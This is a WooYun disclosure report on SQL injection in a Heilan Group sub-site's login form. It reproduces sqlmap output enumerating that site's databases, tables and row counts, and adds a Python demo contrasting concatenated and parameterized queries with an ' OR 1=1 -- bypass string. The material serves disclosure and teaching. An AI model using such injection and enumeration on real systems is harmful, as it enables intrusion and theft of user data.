Vulnerability Summary

Defect ID: wooyun-2013-045861

Title: SQL injection on a sub-site of Heilan Group can lead to information disclosure

Vendor: Heilan Group (海澜集团)

Author: sunding

Submitted: 2013-12-16 11:24

Fixed: 2014-01-30 11:25

Published: 2014-01-30 11:25

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 20

Status: Vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability Details

Disclosure status:

2013-12-16: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2014-01-30: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

A sub-site of Heilan Group is vulnerable to SQL injection, leading to information disclosure.

Detailed description:

Vulnerable URL: http://heilanequestrian.com/account/login.html
The username field is vulnerable to SQL injection.



web application technology: Apache
back-end DBMS: MySQL 5.0
[16:32:18] [INFO] fetching current user
[16:32:18] [INFO] resumed: [email protected].%.%
current user: '[email protected].%.%'
[16:32:18] [INFO] fetching current database
[16:32:18] [INFO] resumed: horsemanship
current database: 'horsemanship'
[16:32:18] [INFO] fetching database names
[16:32:18] [INFO] the SQL query used returns 3 entries
[16:32:18] [INFO] resumed: information_schema
[16:32:18] [INFO] resumed: horsemanship
[16:32:18] [INFO] resumed: test
available databases [3]:
[*] horsemanship
[*] information_schema
[*] test
---
[16:39:25] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[16:39:25] [INFO] fetching tables for database: 'horsemanship'
[16:39:25] [INFO] the SQL query used returns 10 entries
[16:39:25] [INFO] resumed: account
[16:39:25] [INFO] resumed: account_card
[16:39:25] [INFO] resumed: invoice_type
[16:39:25] [INFO] resumed: order_compete
[16:39:25] [INFO] resumed: order_seats
[16:39:25] [INFO] resumed: orders
[16:39:25] [INFO] resumed: static_content
[16:39:25] [INFO] resumed: user_basic
[16:39:25] [INFO] resumed: user_powers
[16:39:25] [INFO] resumed: user_powers_option
Database: horsemanship
[10 tables]
+--------------------+
| account |
| account_card |
| invoice_type |
| order_compete |
| order_seats |
| orders |
| static_content |
| user_basic |
| user_powers |
| user_powers_option |
+--------------------+
[16:39:49] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[16:39:49] [WARNING] missing table parameter, sqlmap will retrieve the number of
entries for all database management system databases' tables
[16:39:49] [INFO] fetching tables for database: 'horsemanship'
[16:39:49] [INFO] the SQL query used returns 10 entries
[16:39:49] [INFO] resumed: account
[16:39:49] [INFO] resumed: account_card
[16:39:49] [INFO] resumed: invoice_type
[16:39:49] [INFO] resumed: order_compete
[16:39:49] [INFO] resumed: order_seats
[16:39:49] [INFO] resumed: orders
[16:39:49] [INFO] resumed: static_content
[16:39:49] [INFO] resumed: user_basic
[16:39:49] [INFO] resumed: user_powers
[16:39:49] [INFO] resumed: user_powers_option
[16:39:49] [INFO] resumed: 3030
[16:39:58] [WARNING] reflective value(s) found and filtering out
[16:39:58] [INFO] retrieved: 0
[16:40:07] [INFO] retrieved: 2
[16:40:16] [INFO] retrieved: 703
[16:40:25] [INFO] retrieved: 850
[16:40:34] [INFO] retrieved: 799
[16:40:43] [INFO] retrieved: 0
[16:40:53] [INFO] retrieved: 2
[16:41:02] [INFO] retrieved: 0
[16:41:11] [INFO] retrieved: 0
Database: horsemanship
+---------------+---------+
| Table | Entries |
+---------------+---------+
| account | 3030 |
| order_seats | 850 |
| orders | 799 |
| order_compete | 703 |
| invoice_type | 2 |
| user_basic | 2 |
+---------------+---------+

Proof of vulnerability:

As above.

Suggested fix:

Filter the input.

Copyright notice: please credit the source when reposting: sunding@WooYun
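Added example, not code from the report or from the affected site: the defect class described above (the username value interpolated into the login query) beside the standard fix, bound parameters rather than input filtering alone. It uses sqlite3 in place of MySQL so it runs in-process; the `account` column names and sample rows are constructed, not taken from the site.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the site's `account` table (assumption:
    # column names are invented); sqlite3 replaces MySQL so it runs in-process.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE account (id INTEGER PRIMARY KEY, "
                 "username TEXT, password TEXT)")
    conn.executemany("INSERT INTO account (username, password) VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2"), ("o'brien", "pw3")])
    return conn

def login_vulnerable(conn, username, password):
    """Builds the query by string concatenation, so the username field is
    parsed as SQL: the defect class the report describes."""
    sql = ("SELECT id FROM account WHERE username = '" + username +
           "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_fixed(conn, username, password):
    """Bound parameters: the driver passes values separately from the SQL
    text, so quotes or keywords in the username stay plain data."""
    row = conn.execute(
        "SELECT id FROM account WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None

def demo():
    """Runs the same inputs through both versions and returns the outcomes
    so the difference can be checked rather than only printed."""
    conn = make_db()
    injected = "' OR 1=1 -- "  # constructed: turns the WHERE clause into a tautology
    results = {
        "vuln_normal": login_vulnerable(conn, "alice", "s3cret"),
        "vuln_injected": login_vulnerable(conn, injected, "anything"),
        "fixed_injected": login_fixed(conn, injected, "anything"),
        "fixed_quoted_name": login_fixed(conn, "o'brien", "pw3"),
    }
    try:
        results["vuln_quoted_name"] = login_vulnerable(conn, "o'brien", "pw3")
    except sqlite3.OperationalError:
        results["vuln_quoted_name"] = "syntax error"  # the stray quote breaks the query
    return results

if __name__ == "__main__":
    print(demo())
```

The quoted legitimate name shows why filtering alone is fragile: the concatenated query fails on ordinary input, while the parameterized query handles both the injection string and the quote correctly.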


Vulnerability Response

Vendor response:

Vendor could not be reached, or vendor actively declined the report